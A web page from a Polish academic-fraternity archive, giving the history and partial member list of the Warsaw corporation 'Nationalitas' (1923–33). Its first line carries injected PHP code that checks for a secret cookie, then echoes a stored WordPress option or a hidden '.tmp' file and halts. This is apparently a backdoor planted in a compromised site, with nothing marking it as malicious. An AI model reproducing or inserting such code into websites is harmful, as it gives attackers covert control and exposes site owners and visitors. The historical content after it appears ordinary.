if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Nationalitas

Dekiel Nationalitas - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Nationalitas”
Siedziba:
Warszawa
Data powstania:
14 VI 1923 r.
Barwy:
fioletowa – złota – błękitna
Dewiza:
„Laboremus pro natione” („Pracujemy dla narodu”)

Rys historyczny

Zaproszenie na Dancing-Bridge K! Nationalitas w 1931 r.

Nationalias została założona dnia 14 VI 1923 r.

Kilka miesięcy po powstaniu korporacja zaangażowała się w tworzenie alternatywnej wobec Związku Polskich Korporacji Akademickich organizacji międzykorporacyjnej o charakterze “narodowo-państwowym” - Konwentu Polskich Korporacji Akademickich. Szczegóły tej współpracy nie są znane. Jednak już w 1925 r. Nationalitas nie była członkiem Konwentu.

Z zachowanych informacji wynika, że w czasie zamachu majowego w maju 1926 r. członkowie korporacji brali udział w walkach po stronie rządowej. Być może to właśnie doświadczenie zbliżyło tę korporację do Związku Polskich Korporacji Akademickich, do którego została przyjęta dnia 16 III 1928 r. (data starszeństwa związkowego: 16 III 1928 r.). Kandydowała pod opieką K! Varsovia. Prawa członka rzeczywistego uzyskała w grudniu 1930 r. W konsekwencji “reform” jędrzejewiczowskich po 1933 r. zanikła.

Siedziba korporacji mieściła się w roku akademickim 1927/28 przy ul. Marszałkowskiej 73/1, w latach 1928-32 przy ul. Koszykowej 80, a w roku akademickim 1932/33 przy ul. Filtrowej 83.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 60 nazwisk.

Brak wiadomości o powojennej działalności Nationalitas i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Nationalitas obejmuje 60 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Teodor Adolph, student UW, akt. 1927-31
 2. Antoni Bieńkowski, c. 1928/29, akt. 1928/29
 3. Stanisław Bołtuć, student SGGW, c. 1929/30, akt. 1929/30
 4. Aleksander Butkiewicz, student PW, akt. 1927-33
 5. Zygmunt Dawidowski, student WSH, c. 1930/31, akt. 1930/31
 6. Stanisław Demby, (1905-1998), stryjeczny brat Bohdana (Astrea), student i absolwent 1932 chemii UW, akt. 1927-31
 7. Wacław Drzewiecki, student PW, a od 1928 PL, akt. 1927-31
 8. Marjan Fitaszewski, c. 1928/29, akt. 1928/29
 9. Stanisław Gendzwiłł, (30 lipca 1907 w Rajgrodzie - 1940 w Katyniu), s. Franciszka i Stanisławy z Owsianych, absolwent Gimnazjum im. M. Kopernika w Grajewie 1927, student SGGW, c. 1929/30, akt. 1929/30-33, po studiach wychowawca młodzieży w Zakładzie Braci Albertynów w Warszawie, a następnie aspirant w więzieniu w Brzeżanach w woj. tarnopolskim, por. rez., przydzielony do 34 Pułku Piechoty, w wojnie obronnej 1939 awansowany na kapitana, w niewoli sowieckiej w obozie Kozielsku, zamordowany przez NKWD
 10. Marian Goeldner, student PW, a od 1930 SGGW, akt. 1927-31, prezes sem. let. 1927/28
 11. Wacław Goeldner, student SGGW, c. 1929/30, akt. 1929/30-31
 12. Kazimierz Grabowski, student WSH, akt. 1927-31, olderman sem. let. 1927/28, prezes sem. let. 1929/30
 13. Bohdan Herbut-Heybowicz (Herburt-Heybowicz), akt. 1924
 14. Witold Iwaszkiewicz, student PW, akt. 1927-33, prezes sem. zim. 1931/32
 15. Konrad Jabłoński, student UW, akt. 1927-31, sekretarz sem. let. 1927/28
 16. Bolesław Jastrzębski, student SGGW, c. 1930/31, akt. 1930/31-33
 17. Konrad Kołakowski, student UW, akt. 1927-31, prezes sem. zim. 1930/31
 18. J. Krzyżanowski,
 19. Litwinowicz,
 20. Kazimierz Łukaszewicz, student UP oraz od 1928 PW, akt. 1927-32
 21. Tadeusz Majewski, student WSH, c. 1929/30, akt. 1929/30-33
 22. Mirosław Matuszewski, student PW, akt. 1930-33, wiceprezes sem. zim. 1931/32
 23. Stanisław Mazurkiewicz, student PW 1927-28 i PL 1928-32, akt. 1927-32
 24. Władysław Musiałowski, student WSH, akt. 1929-33
 25. Gustaw Obracaj, student PW, c. 1929/30, akt. 1929/30-33, wiceprezes sem. zim. 1930/31
 26. Witold Obuchowicz, student UJ oraz od 1929 SGGW, akt. 1927-33
 27. Ksawery Orzechowski, student WSH, c. 1930/31, akt. 1930/31-33
 28. Tadeusz Orzechowski, student WSH, c. 1930/31, akt. 1930/31-33
 29. Jan Ostrowski, założyciel Nationalitas
 30. Stanisław Ostrowski, student PW, akt. 1927-31, wiceprezes sem. let. 1929/30, olderman sem. zim. 1931/32
 31. Bolesław Owoc, student PW, c. 1931/32, akt. 1931/32-33
 32. Antoni Paszkowski, student UW, akt. 1929-31, sekretarz sem. let. 1929/30
 33. Jan Korwin Piotrowski, student PW, akt. 1927-33, wiceprezes sem. let. 1928/29, olderman sem. let. 1929/30
 34. Wacław Korwin Piotrowski, student WSH, c. 1929/30, akt. 1929/30-32
 35. Tadeusz Podziemski, akt. 1923-24, pierwszy prezes Konwentu Polskich Korporacji Akademickich 1923-24
 36. Janusz Poziomski, c. 1928/29, akt. 1928/29
 37. Henryk Radwański, akt. 1927-28
 38. Stanisław Rakowski, student WSH, c. 1932/33, akt. 1932/33
 39. Jerzy Rodziewicz, student UW, akt. 1927-33, sekretarz sem. let. 1928/29, prezes sem. zim. 1932/33
 40. Tadeusz Rodziewicz, student UW, c. 1930/31, akt. 1930/31-32
 41. Bolesław Rossiński, student PW, akt. 1927-33, wiceprezes sem. let. 1927/28
 42. Czesław Rossiński, student SGGW, od 1931 UP, akt. 1927-33, prezes sem. let. 1928/29
 43. Zdzisław Rychlicki, student SGGW, c. 1928/29, akt. 1928/29-33, olderman sem. zim. 1930/31
 44. Janusz Ryszkiewicz, student UW oraz od 1928 USB, akt. 1927-31
 45. Stanisław Rzepecki, akt. 1923-24, II wiceprezes Konwentu Polskich Korporacji Akademickich 1923-24
 46. Mieczysław Sikora, student PW, c. 1929/30, akt. 1929/30-33, sekretarz sem. zim. 1931/32
 47. Stanisław Skotnicki, student UW, c. 1928/29, akt. 1928/29-31
 48. Jan Smolicz, student SGGW, akt. 1927-33
 49. Władysław Sokołowski, student UP oraz od 1928 UW, akt. 1928-31
 50. Jan Spława Neyman, student PW, akt. 1927-33
 51. Tadeusz Strzeszyński, student WSH, akt. 1927-33
 52. Stefan Szymala, student UW, c. 1932/33, akt. 1932/33
 53. Jan Szymański, student WSH, akt. 1927-32
 54. Eligiusz Tarach, student PW, c. 1930/31, akt. 1930/31-33
 55. Marjan Tesławski, student UW, akt. 1927-30
 56. Kazimierz Urbanowski, student UJ 1927-29 oraz SGGW 1929-30, akt. 1927-30
 57. Franciszek Włodarczyk, student UW, od 1931 student SNP, c. 1929/30, akt. 1929/30-32, sekretarz sem. zim. 1930/31, sekretarz sem. zim. 1932/33
 58. Kazimierz Zborowski, student UW, akt. 1927-33, wiceprezes sem. zim. 1932/33
 59. Czesław Złotkowski, student SGGW, c. 1928/29, akt. 1928/29-33
 60. Wacław Żywno, student SGGW, c. 1928/29, akt. 1928/29-33

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1928-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Nationalitas.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 1 IX 2010 r.
Ostania zmiana: 21 VII 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Nationalitas (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 21 VII 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }